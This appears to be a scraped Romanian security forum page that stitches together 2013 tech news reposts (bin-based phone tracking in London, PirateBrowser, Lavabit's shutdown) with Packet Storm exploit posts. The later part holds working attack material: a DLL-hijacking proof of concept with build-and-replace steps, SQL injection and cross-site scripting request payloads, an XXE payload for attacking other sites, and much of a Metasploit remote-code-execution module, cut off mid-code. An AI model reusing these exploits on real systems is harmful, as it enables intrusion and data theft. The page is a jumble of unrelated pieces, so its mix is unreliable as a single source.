Matt

Electronic BINS in the heart of London must stop tracking hundreds of thousands of passing smartphones, officials have demanded. A dozen or so high-tech rubbish cans - which display adverts and information on built-in flat-screens and are dotted around the capital's financial district's pavements - were set up to collect data from nearby phones. The recycling bins, operated by Renew London, used Wi-Fi networking to identify devices using their individual MAC addresses, effectively handing over the "proximity, speed ... and manufacturer” of the gizmos. MAC addys are unique to each piece of network interface hardware out there, but they can be easily altered by software if one is in the know; the addresses also reveal the maker of the networking chipset. The company said it used these so-called bin-based ORBs to silently detect 4,009,676 devices in one week, although that really amounts to 530,000 unique phones. Renew, which said the collected data was "anonymised" before it was analysed, hoped to use this technology to track footfall in shopping areas and perhaps even show tailored adverts to people as they walked by the bins. But the first pilot testing the Orb system has now been cancelled after The City of London Corporation, which oversees the centre of the Big Smoke, pulled the plug. The authority only found out about the trial when journalists got hold of the study, a source told The Register. A report has also been made to Blighty's privacy watchdog, the Information Commissioner. A spokesman for the corporation said: "We have already asked the firm concerned to stop this data collection immediately and we have also taken the issue to the Information Commissioner’s Office. Irrespective of what’s technically possible, anything that happens like this on the streets needs to be done carefully, with the backing of an informed public. "This latest development was precipitate and clearly needs much more thought. In the meantime data collection – even if it is anonymised - needs to stop." (Don't forget that modern smartphone makers already track your movements by default: both Apple and Google already track people through their location services features, although these can be disabled. Unlike the tracking in the bins.) In a statement, Renew boss Kaveh Memari claimed the reaction to his firm's technology was blown out of proportion. He said: "I’m afraid that in the interest of a good headline and story there has been an emphasis on style over substance that makes our technology trial slightly more interesting than it is. "During our initial trials, which we are no longer conducting, a limited number of pods had been testing and collecting anonymised and aggregated MAC addresses from the street and sending one report every three minutes concerning total footfall data from the sites. A lot of what had been extrapolated is capabilities that could be developed and none of which are workable right now." ® Source TheRegister.co.uk

The Pirate Bay has released a bundle of add-ons to help people search for and access bits of the internet that governments and ISPs have locked away. The only hitch is: despite the fact that it contains a Tor client, security experts have said that it doesn't completely anonymise internet traffic. This has raised concerns about users' security. PirateBrowser, released in celebration of the torrent site's 10th birthday – and with a bunch of torrent sites already bookmarked, natch – is based on Firefox Portable and comes bundled with proxy-management toolset Foxyproxy and the Tor client Vidalia. In its FAQ, The Pirate Bay says: Security experts have complained that The Pirate Bay failed to adhere to Tor security protocols, with one observer claiming the new browser was "unsafe". The new browser was released on Saturday, the notorious file-sharing site's 10th anniversary. The Pirate Bay said: "Do you know any people who can't access TPB or other torrent sites because they are blocked? Recommend PirateBrowser to them. It's a simple one-click browser that circumvents censorship and blockades and makes the site instantly available and accessible." It added: "This browser is intended just to circumvent censorship — to remove limits on accessing websites your government doesn't want you to know about." But Twitter has erupted in criticism. The Spy Blog, which focuses on security, privacy and surveillance issues, tweeted: #PirateBay #ThePirateBay don't touch #PirateBrowser ! Crippled Tor Browser Bundle: no Tor Button, no NoScript, no package Digital Signature — Spy Blog (@spyblog) August 11, 2013 Jacob Appelbaum, a security bod and a spokesman for the Tor Project, also tweeted Piratebrowser seems like they didn't read the Tor Browser Design documents. It seems unsafe. — Jacob Appelbaum (@ioerror) August 11, 2013 In an FAQ about the browser, The Pirate Bay reassured torrent-seekers that there were no hidden nasties in their software. It said: "There have been no modifications to any of the packages used, no adware, Trojans, toolbars, etc. This is simply a tool to help people get around censorship." The creators of PirateBrowser lumped the UK and other countries that have issued court orders blocking access to torrent search sites together with international badboys like Iran and North Korea, claiming that nations around the world want to "limit" their citizens' online access. TPB described the PirateBrowser thus: The Pirate Bay has come under attack in recent months, with founder Gottfrid Svartholm Warg sentenced to two years' imprisonment in Sweden after being found guilty of hacking. ® * Sites expressing anti-government views or which include "undesirable content", such as YouTube, are routinely blocked in Iran. VPN services and certain social networking websites are also blocked. Source TheRegister.co.uk

Ai scris cu alb si nu se vede nimic, decat .

Trend Micro colaboreaza cu INTERPOL in lupta impotriva criminalitatii informatice la nivel mondial Trend Micro, lider global in industria solutiilor software de securitate, a anuntat recent un protol de colaborare cu INTERPOL prin care isi ofera sprijinul in activitatile de lupta impotriva criminalitatii informatice. In ultimii ani, retele infractionale bine organizate, cu operare pe scara larga, au facut ca amenintarile cibernetice sa devina mai sofisticate si mult mai rapide, ajungand la tinta in nu mai putin de cateva minute. Din cauza cresterii complexitatii acestui mediu infractional, investigatiile cibernetice sunt si ele mult mai complexe, solicitand un nivel de expertiza tehnica foarte ridicata si actiuni de cercetare ce presupun conexiune intre multiple juridictii. Este esential ca institutiile responsabile cu aplicarea legilor sa isi prioritizeze resursele, sa construiasca relatii de colaborare intre diverse jurisdictii si sectoare de activitate pentru a dezvolta competentele tehnice, instrumentele si infrastructura de care au nevoie pentru a combate eficient amenintarile informatice si a pentru a imbunatati securitatea digitala in general. Pentru aceasta, INTERPOL pune bazele INTERPOL Global Complex for Innovation (IGCI) ce va fi creat in Singapore in 2014 si va functiona ca un centru de excelenta pentru cooperare intenationala impotriva criminalitatii informatice organizate. Centrul va urmari sa construiasca o alianta cu multiple organisme specializate in securitate IT, dar si specialisti in Internet Security din mediul privat pentru a folosi expertiza lor in beneficiul tuturor institutiilor ce lupta impotriva criminalitatii cibernetice. Trend Micro va sprijini INTERPOL prin intermediul expertilor sai in securitate IT in scopul eradicarii retelelor de infractori cibernetici. In cursul lunii trecute, Ewa Chen, CEO al Trend Micro s-a intalnit la Lyon cu Ronald K. Noble, Secretar General al INTERPOL pentru a discuta detalii referitoare la aceasta colaborare. Trend Micro va oferi programe de training atat angajatilor INTERPOL, cat si organizatiilor guvernamentale sau serviciilor de politie din tarile participante la acest centru, cat si marilor companii care gestioneaza infrastructuri de baza. Programele de training vor include module de eLearning pentru studiu online, sesiuni cu prezenta fizica in salile de curs, workshop-uri si sesiuni de certificari profesionale, bazate pe anumite obiective de studiu. Colaborarea cu INTERPOL va permite Trend Micro sa faca inca un pas catre a-si indeplini viziunea de a contribui la o lume mai sigura pentru schimburile de date. “Romania este printre tarile member INTERPOL inca din 1923 si face parte, de asemenea, din ENISA (Agentia Europeana pentru Securitatea Retelelor Informatice si a Datelor in UE). Astfel, o colaborare cu INTERPOL in cadrul acestui centru ar fi foarte probabila avand in vedere eficienta implicarii autoritatilor romane in actiunile de combatere a infractionalitatii cibernetice din ultimii ani”, explica Alexandru Molodoi, CTO GECAD NET, unicul distribuitor in Romania al solutiilor de securitate Trend Micro. Mai multe detalii despre produsele Trend Micro gasiti aici: Trend Micro | Antivirus | Antispam | GECAD SHOP Source FaraVirusi.Com

Facebook's Sheryl Sandberg, who is second in command at the free content ad network, sold a big chunk of shares in the company just days after stocks finally hit a higher value than they were assigned at the firm's initial public offering (IPO). US regulatory filings released late last week show that Sandberg offloaded a further 2.37 million shares at an average price of $38 – altogether worth around £91m to the ex-Google exec and author of Lean In: Women, Work, and the Will to Lead. As we noted last month, Facebook boss Mark Zuckerberg has retained his shares. Of course, he said at the time – just after the company's gigantic belly-flop on the New York Stock Exchange in May last year – that he wouldn't be selling any stock for personal gains until September 2013 at the earliest. Sandberg, on the other hand, has regularly shifted her stock under automated trading plans. Significantly, her shares sale – dated 9 August on the filing – is the biggest one made by any of the high flyers at Facebook since it punched through its IPO price 10 days earlier, on 30 July this year. In November 2012, Zuck's right-hand woman banked approximately $7.44m after she sold around 353,000 of her shares in Facebook as trading restrictions for employees expired. But her latest sale completely eclipses that figure. Despite letting go of around five per cent of the stock, Sandberg still holds more than $1bn in Facebook shares. Shares in Facebook were slightly up on Nasdaq at $38.56 in after-hour trading on Friday. It took Facebook more than a year to slide past its IPO share price only after the company last month satisfied Wall Street with impressive record earnings off the back of strong mobile growth. ® Source TheRegister.co.uk

Windows Phone owners must wait until next spring for a major platform update, latest reports appear to confirm. The platform has shown strong growth in 2013, almost entirely thanks to a concerted campaign by Nokia and almost entirely at the expense of BlackBerry. But the upsurge in momentum hasn't obliged Microsoft to break a sweat: there are unlikely to be any surprises prior to Windows Phone 8.1 – codenamed by Windows as the "Blue" Phone update – which has been pegged for release in spring 2014. But one more "service pack" (Redmond brands these as General Distribution Releases, or GDRs) is expected before then, The Verge reports. GDR3 will give platform support to 1080-pixel screens, an orientation lock and … a Driver Mode. They won't be handing out beta blockers to dampen the WinPhonbois with this one. The current "service pack", GDR2, is currently being rolled out. Among other things, it included HTML5 improvements, a stability upgrade to Skype and FM radio. The updates generally hit new Windows Phones first before being introduced on the older phones. Big changes... but they're all backstage Microsoft did a remarkable job of switching platforms last year without anybody really noticing: it moved the Windows Phone OS to a new kernel, new app framework and a new API - abandoning the legacy Embedded CE kernel, and deprecating the Compact .NET framework (program-execution environment for apps) and Silverlight upon which Windows Phone 7.x was based. Impressively, it also did so without any compatibility glitches and by hitting demanding system requirements, making for a pretty lean package. The volume growth this year owes much to the Windows Phone 8's ability to perform well in 512MB on a 1Ghz processor - something BlackBerry can't manage with BB10 and which has so far eluded Landfill Android and trade devices also. But these are behind-the-scenes improvements. Other than a "Kid's Corner" and resizable tiles, hardly anything has changed out in userland. In fact, the 2011's Mango update – aka WinPhone 7.5 - provided the last significant major userland change, and arguably the only major noticeable overhaul since Windows Phone's launch in late 2010. And it's not as if it's perfect. Users are impatient for a modern notifications - promised in 8.0 but held over for lack of time - and the system still lacks the on-device search function that all rivals now offer. Yet for all its relative success, the Windows Phone team must march to a corporate step. The chaotic legacy of Steve Sinofsky's tenure left Microsoft building "modern" apps on three incompatible UIs: Win 8 desktop, RT and Windows Phone. This year Microsoft also undertook its biggest ever re-organisation, with leading lights including WinPhone boss Terry Myerson moving out of the team. Some sources familiar with the team suggest this might actually speed up development - "Myerson’s very much about preserving the purity of his platform," one potential ODM told us this year. ® Source TheRegister.co.uk

Analysis The sudden closure of two secure email services may cause many privacy-conscious people to begin looking for alternatives. However, security experts warn that any service provider may be put under pressure to comply with authorities, and this might kill off secure mail as we know it. Lavabit's Levison: No more palaver, I'm lathered over {redacted} The issue has become even more of a hot topic among infosec professionals since Texas-based Lavabit – reportedly NSA whistleblower Edward Snowden's preferred email provider – announced it was going to roll down the shutter on services on Thursday. Ladar Levison, the owner of Lavabit, said the firm had "decided to suspend operations" in the face of US legal pressure over recent weeks as an unpalatable but better alternative to becoming “complicit in crimes against the American people”. Levison is careful not to say this directly, but the implication is that he was either served with a court order from the Foreign Intelligence Surveillance Court or a National Security Letter. Both legal documents come with compulsory gag orders. You can see an interview with Nicholas Merrill, one of the few people to win the right to talk about a National Security Letter he was served with, here.) Man-in-the-middle attack likely only way to get around encryption Lavabit encrypts stored messages using public key cryptography as well as encrypting the contents of email in transit to guard against eavesdropping. This means that without a customer's private key nobody - not even Levison – can unscramble message. This is a marked difference from bigger webmail providers such as Google's Gmail or Microsoft's Outlook.com, which hold the keys that would allow them to unscramble messages and turn them over to the authorities, if compelled. Email stored on Lavabit's servers was encrypted using asymmetric elliptical curve cryptography, as explained in documents about its architecture. This service was only available to holders of premium accounts (among them, reportedly, Edward Snowden, who was said to have maintained the somewhat prosaic address edsnowden@lavabit.com). The Feds might be seeking to intercept communications in transit between Levabit and its customers using some form of man in-the-middle attack or even seeking to plant government-sanctioned malware, El Reg's security desk speculates. If Snowden was the intended target then all sorts of exotic zero-day exploits might have been brought into play. This is all complete guesswork on our part and all we know for sure is that Lavabit shut itself down to avoid complying with something it found intolerable while it takes its case to the Fourth Circuit Court of Appeals. The owner of the boutique email service provider said he hoped to relaunch Lavabit in the US providing its pending appeals court case goes its way. It has begun soliciting donations for a legal defence fund. Levison said the whole experience had taught him a "very important lesson: without congressional action or a strong judicial precedent, I would _strongly_ recommend against anyone trusting their private data to a company with physical ties to the United States," he said. PGP daddy shuts down new secure email service Hours later PGP daddy Phil Zimmerman's Silent Circle said it was shutting down its recently inaugurated email service rather than having to face the possibility of receiving a secret court order in future. The firm is continuing with its core business of supplying secure messaging and encrypted voice apps for smartphones. But Silent Circle said it had unplugged and wiped its email service even in absence of any search or seizure order from government. "We see the writing the wall, and we have decided that it is best for us to shut down Silent Mail now," Jon Calls, Silent Circle's CTO, explains in a blog post. "We have not received subpoenas, warrants, security letters, or anything else by any government, and this is why we are acting now." Silent Circle runs its servers in Canada and has plans to expand to Switzerland. For the time being, though, it only has offices in the US and UK. However, despite having a presence outside the US, the owners still decided they wouldn't able to continue Silent Mail in good conscience. Any UK firm offering similar services to Lavabit and Silent circle would have to comply with RIPA and any other future local law, such as the Snoopers' Charter, if it is ever reanimated. And any service provider in the EU would be obliged to adhere to the Data Retention Directive, which specifies (among other things) that each [member state's] authority shall in particular be endowed with investigative powers, such as powers of access to data forming the subject-matter of processing operations and powers to collect all the information necessary for the performance of its supervisory duties. Setting up a secure ISP in an EU state means living with a regime little more friendly than that which exists in the US. "All EU member states have to comply with the Data Retention Directive," Brian Honan, of BH Consulting and founder of Ireland's CSIRT told El Reg. "Each EU member state will implement the directive differently and will also have their own local laws too." Honan said the only secure alternative is a DIY approach using encryption tools such as PGP. And even that approach won't always work – either due to a failure to use the technology properly or malware infection. "Use PGP on the desktop as only you have access to your private key. For extra protection keep private key separate from PC," Honan told El Reg Source TheRegister.co.uk

The hacking team behind the notorious attack on The New York Times has targeted an unnamed economic policy agency with new hyper-sophisticated malware, according to FireEye researchers. FireEye reported unearthing the new hack tools when analysing a recent attack on one of the company's clients, warning that the malware is significantly more advanced than those used in the group's previous campaigns. "The attackers behind an audacious breach of The New York Times' computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware. The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits," wrote the researchers. News of The New York Times attack broke in January, when the publication reported being the victim of an ongoing cyber campaign. Security firm Mandiant, which helped mitigate the attack, subsequently reported linking the campaign to a Chinese group. The attacks are believed to have been carried out in retaliation to a series of articles about former Chinese prime minister Wen Jiabao. FireEye senior malware researcher Ned Moran told V3 the new attacks use evolved versions of the longstanding Aumlib and Ixeshe malwares, which have been used by criminals in targeted attacks for several years. He added that the upgraded tools are designed to help the criminals avoid detection, even from advanced systems designed to detect their previous tools, when hacking into their victim's network. "The network protocol has been altered. Signatures designed to detect the previous version of these tools may not detect these new network protocols. This may enable the threat actor to operate undetected," said Moran. The report said, while troubling, the development is not surprising and is typical of most hackers; the group that hacked The New York Times is simply amending its strategy having been discovered. "Attackers do not change their approach unless an external force or environmental shift compels them to. As the old saying goes: if it ain't broke, don't fix it," read the report. The attack is one of many advanced threats uncovered this year. Arbor Networks last week reported uncovering a new bruteforce botnet campaign, which has already infected over 25,000 Windows machines with malware using an unknown infection method. Source V3.co.uk

US president Barack Obama held a meeting last week with Apple CEO Tim Cook, Google computer scientist Vint Cerf and Randall Stephenson, the CEO of US telecoms giant AT&T, it has emerged. According to Politico, the meeting discussed the NSA and other privacy issues including tracking consumers online. This followed a gathering earlier last week attended by the bodies representing companies including Facebook, Microsoft, Google and Yahoo: TechAmerica, the Information Technology Industry Council and TechNet. A White House official told Politico that the talks were a part of the president's ongoing efforts to work out how to best handle the storm surrounding June's PRISM revelations. "This is one of a number of discussions the administration is having with experts and stakeholders in response to the president's directive to have a national dialogue about how to best protect privacy in a digital era, including how to respect privacy while defending our national security," the source said. The meetings follow an open letter to the president in June, seeking to increase the transparency of government data requests in an effort to limit the PR damage caused by the mysterious and unexplained handing over of data. The signatories included Apple, Facebook, Microsoft, Twitter and Yahoo, as well as 17 other tech corporations. "Just as the United States has long been an innovator when it comes to the internet and products and services that rely upon the internet, so too should it be an innovator when it comes to creating mechanisms to ensure that government is transparent, accountable, and respectful of civil liberties and human rights," the letter said. Last week, in a bid to curb further alleged privacy violations, firms Lavabit and Silent Circle both discontinued their secure email services following government interference. Lavabit specifically had been linked to NSA whistleblower Edward Snowden, who revealed the extent of PRISM in June. Source V3.CO.UK

https://www.dropbox.com/s/vvs1tiny87j6900/124317598-James-Fenimore-Cooper-Ultimul-Mohican.pdf

Stai linistit ca asta cu 1.6 % e vrajeala. "Echelon" sigur isi face treaba

Description Bricks is a web application security learning platform built on PHP and MySQL. The project focuses on variations of commonly seen application security issues. Each 'Brick' has some sort of security issue which can be leveraged manually or using automated software tools. The mission is to 'Break the Bricks' and thus learn the various aspects of web application security. Bricks is a completely free and open source project brought to you by OWASP. Changes : This is the seventh public release of Bricks. A new challenge can be found on the login pages section. Download : HERE

Description : HTCSyncManagerUpdate suffers from a DLL hijacking vulnerability. Author : Iranian_Dark_Coders_Team Source : HTCSyncManagerUpdate DLL Hijacking ? Packet Storm Code : Exploit Title: HTCSyncManagerUpdate (quserex.dll & mfc71enu.dll & mfc71loc.dll ) Path Subversion Arbitrary DLL Injection Code Execution Author: Iranian_Dark_Coders_Team Discovered by A.CH12 Software Link: http://www.htc.com/ Version: 2.1.46.0 Tested on: Windows 7 // :::'###::::::::::::::::'######::'##::::'##::::'##::::'#######:: // ::'## ##::::::::::::::'##... ##: ##:::: ##::'####:::'##.... ##: // :'##:. ##::::::::::::: ##:::..:: ##:::: ##::.. ##:::..::::: ##: // '##:::. ##:::::::::::: ##::::::: #########:::: ##::::'#######:: // #########:::::::::::: ##::::::: ##.... ##:::: ##:::'##:::::::: // ##.... ##::::'###:::: ##::: ##: ##:::: ##:::: ##::: ##:::::::: // ##:::: ##:::: ###::::. ######:: ##:::: ##::'######: #########: // ..:::::..:::::...::::::......:::..:::::..:::......::.........:: ============================================================= #include <windows.h> #define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg(); } int egg() { system ("calc"); exit(0); return 0; } ============================================================= Instructions: 1. Compile dll 2. Replace quserex.dll or mfc71enu.dll or mfc71loc.dll in HTC Sync Manager directory with your newly compiled dll 3. Launch HTCSyncManagerUpdate 4. Bo0o0o0o0o0o0o0m ! Greet to my Lovely friends : nimaarek , D.S (ASA);

Description : vbBux / vbPlaza version 4.0.3 suffers from a remote SQL injection vulnerability. Author : n3tw0rk Source : vbBux / vbPlaza 4.0.3 SQL Injection ? Packet Storm Code : # Exploit Title: vbBux and vbPlaza v4 SQLI # # Author(s): n3tw0rk (twiiter.com/n3tw0rkgod) # # Contact: Mail:infectedelite@gmail.com # # Product: 4.0.3 and below # # Software Version x.x.x # # Product Download: http://www.vbulletin.org/forum/showthread.php?t=270271# # Homepage: d4tabase.com # _____________________________________________________________# The exploit is caused due to a variable named 'vbplaza_lottery_history' not being sanitized before being used within an insert into statement. POC You will need Admincp Access then go to http://localhost/admincp/vbplaza_lottery.php?do=searchhistory then in the force read order column put a ' into the search bar and result should show Database error in vBulletin 4.2.1: Invalid SQL: Database error in vBulletin 4.2.1 Invalid SQL: SELECT COUNT(*) AS count FROM vbplaza_lottery_history WHERE 1=1 AND (lotteryid = '); MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 3 Error Number : 1064 Request Date : Sunday, August 11th 2013 @ 05:17:53 PM Error Date : Sunday, August 11th 2013 @ 05:17:54 PM Script : http://localhost/admincp/vbplaza_lottery.php?do=findhistory Referrer : http://localhost/admincp/vbplaza_lottery.php?do=searchhistory IP Address : ::1 Username : n3tw0rk Classname : vB_Database MySQL Version : 5.5.27

Description : Gnew 2013.1 suffers from cross site scripting and remote SQL injection vulnerabilities. Author : LiquidWorm Source : Gnew 2013.1 Cross Site Scripting / SQL Injection ? Packet Storm Code : Gnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities Vendor: Raoul Proença Product web page: http://www.gnew.fr Affected version: 2013.1 Summary: Gnew is a simple Content Management System written with PHP language and using a database server (MySQL, PostgreSQL or SQLite) for storage. Desc: Input passed via several parameters is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and HTML/script code in a user's browser session in context of an affected site. ============================================================================================ | PARAM | TYPE | FILE | ============================================================================================ | | | gnew_template | XSS | /users/profile.php, /articles/index.php, /admin/polls.php | |------------------------------------------------------------------------------------------| | category_id | XSS | /news/submit.php | |------------------------------------------------------------------------------------------| | news_id | XSS, SQLi | /news/send.php, /comments/add.php | |------------------------------------------------------------------------------------------| | post_subject | XSS | /posts/edit.php | |------------------------------------------------------------------------------------------| | thread_id | XSS, SQLi | /posts/edit.php | |------------------------------------------------------------------------------------------| | user_email | SQLi | /users/register.php, /users/password.php | | | ============================================================================================ Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.7 MySQL 5.5.25a Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5153 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5153.php 23.07.2013 --- #1 [xss] GET /gnew/users/profile.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/gnew/admin/index.php Cookie: PHPSESSID=8nta354i78d5att3l2gkh9g573; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean"><script>alert(1)</script> Connection: keep-alive #2 [xss] POST /gnew/news/submit.php HTTP/1.1 Content-Length: 112 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate category_id=1"><script>alert(2);</script>&news_source=1&news_subject=1&news_text=1&preview=Preview&submit=Submit #3 [xss] POST /gnew/news/send.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate friend_email=lab@zeroscience.mk&html_email=1&news_id=572"><script>alert(3);</script>&send=Send&user_email=root@att.com&user_name=admin #4 [xss] POST /gnew/comments/add.php HTTP/1.1 Content-Length: 96 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate add=Add&comment_subject=1&comment_text=1&news_id=574"><script>alert(4);</script>&preview=Preview #5 [sqli] POST /gnew/news/send.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate friend_email=lab@zeroscience.mk&html_email=1&news_id=572{SQL Injection}&send=Send&user_email=root@att.com&user_name=admin #6 [xss] POST /gnew/posts/edit.php HTTP/1.1 Content-Length: 153 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=zsl"><script>alert(5);</script>&post_text=test&preview_edited=Preview&thread_id=6 #7 [xss] POST /gnew/posts/edit.php HTTP/1.1 Content-Length: 184 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6"><script>alert(6);</script> #8 [sqli] POST /gnew/posts/edit.php HTTP/1.1 Host: localhost Content-Length: 127 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6{SQL Injection} #9 [sqli] POST /gnew/users/password.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/gnew/users/password.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 40 user_name=test&user_email={SQL Injection}&password=Send #10 [sqli] POST /gnew/users/register.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/gnew/users/password.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 40 user_name=test&user_email={SQL Injection}&password=Send

Description : This is a supplement to the SA-20130719-0 SEC Consult advisory that notes an additional attack vector for an XXE injection vulnerability in Sybase EAServer. Author : MustLive Source : Sybase EAServer XXE Injection ? Packet Storm Code : Hello! I'll give you additional information concerning advisory SEC Consult SA-20130719-0 :: Multiple vulnerabilities in Sybase EAServer (http://securityvulns.ru/docs29622.html). It's about XXE Injection in Sybase EAServer. Among vulnerabilities in EAServer there is XXE Injection and it was only mentioned about local file inclusion and directory listing attack vector. But this XXE Injection vulnerability also allows to conduct attacks on other sites. So I'll supplement SEC Consult's advisory and will bring your attention to another attack vector. I wrote about such attacks in my 2012's article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) and 2013's "Using XXE vulnerabilities for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html). As I described in my articles, XXE vulnerabilities can be used for conducting CSRF and DoS attacks on other sites (and at using multiple web sites it's possible to conduct DDoS attacks). And last month I released a tool for conducting such attacks - in DAVOSET v.1.1.2 I added support of XML requests for XXE vulnerabilities. XXE (WASC-43): For the attack it's needed to send the next XML data in POST request. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://site/page">]> <lol> <dt> <stringValue>&xxe;</stringValue> <booleanValue>0</booleanValue> </dt> </lol> So all servers with affected versions of Sybase EAServer can be used for attacks on other sites via XXE. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

Description : This Metasploit module implements remote command execution on Ruby on Rails applications. Prerequisite is knowledge of the "secret_token" (Rails 2/3) or "secret_key_base" (Rails 4). The values for those can be usually found in the file "RAILS_ROOT/config/initializers/secret_token.rb". The module achieves RCE by deserialization of a crafted Ruby Object. Author : joernchen Source : Ruby on Rails Known Secret Session Cookie Remote Code Execution ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking #Helper Classes copy/paste from Rails4 class MessageVerifier class InvalidSignature < StandardError; end def initialize(secret, options = {}) @secret = secret @digest = options[:digest] || 'SHA1' @serializer = options[:serializer] || Marshal end def generate(value) data = ::Base64.strict_encode64(@serializer.dump(value)) "#{data}--#{generate_digest(data)}" end def generate_digest(data) require 'openssl' unless defined?(OpenSSL) OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get(@digest).new, @secret, data) end end class MessageEncryptor module NullSerializer #:nodoc: def self.load(value) value end def self.dump(value) value end end class InvalidMessage < StandardError; end OpenSSLCipherError = OpenSSL::Cipher::CipherError def initialize(secret, *signature_key_or_options) options = signature_key_or_options.extract_options! sign_secret = signature_key_or_options.first @secret = secret @sign_secret = sign_secret @cipher = options[:cipher] || 'aes-256-cbc' @verifier = MessageVerifier.new(@sign_secret || @secret, :serializer => NullSerializer) # @serializer = options[:serializer] || Marshal end def encrypt_and_sign(value) @verifier.generate(_encrypt(value)) end def _encrypt(value) cipher = new_cipher cipher.encrypt cipher.key = @secret # Rely on OpenSSL for the initialization vector iv = cipher.random_iv #encrypted_data = cipher.update(@serializer.dump(value)) encrypted_data = cipher.update(value) encrypted_data << cipher.final [encrypted_data, iv].map {|v| ::Base64.strict_encode64(v)}.join("--") end def new_cipher OpenSSL::Cipher::Cipher.new(@cipher) end end class KeyGenerator def initialize(secret, options = {}) @secret = secret @iterations = options[:iterations] || 2**16 end def generate_key(salt, key_size=64) OpenSSL::PKCS5.pbkdf2_hmac_sha1(@secret, salt, @iterations, key_size) end end include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Known Secret Session Cookie Remote Code Execution', 'Description' => %q{ This module implements Remote Command Execution on Ruby on Rails applications. Prerequisite is knowledge of the "secret_token" (Rails 2/3) or "secret_key_base" (Rails 4). The values for those can be usually found in the file "RAILS_ROOT/config/initializers/secret_token.rb". The module achieves RCE by deserialization of a crafted Ruby Object. }, 'Author' => [ 'joernchen of Phenoelit <joernchen[at]phenoelit.de>', ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://charlie.bz/blog/rails-3.2.10-remote-code-execution'], #Initial exploit vector was taken from here ['URL', 'http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/'] ], 'DisclosureDate' => 'Apr 11 2013', 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptInt.new('RAILSVERSION', [ true, 'The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)', 3]), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "GET"]), OptString.new('SECRET', [ true, 'The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)', nil]), OptString.new('COOKIE_NAME', [ false, 'The name of the session cookie',nil]), OptString.new('DIGEST_NAME', [ true, 'The digest type used to HMAC the session cookie','SHA1']), OptString.new('SALTENC', [ true, 'The encrypted cookie salt', 'encrypted cookie']), OptString.new('SALTSIG', [ true, 'The signed encrypted cookie salt', 'signed encrypted cookie']), OptBool.new('VALIDATE_COOKIE', [ false, 'Only send the payload if the session cookie is validated', true]), ], self.class) end # # This stub ensures that the payload runs outside of the Rails process # Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first if RUBY_PLATFORM =~ /mswin|mingw|win32/ inp = IO.popen("ruby", "wb") rescue nil 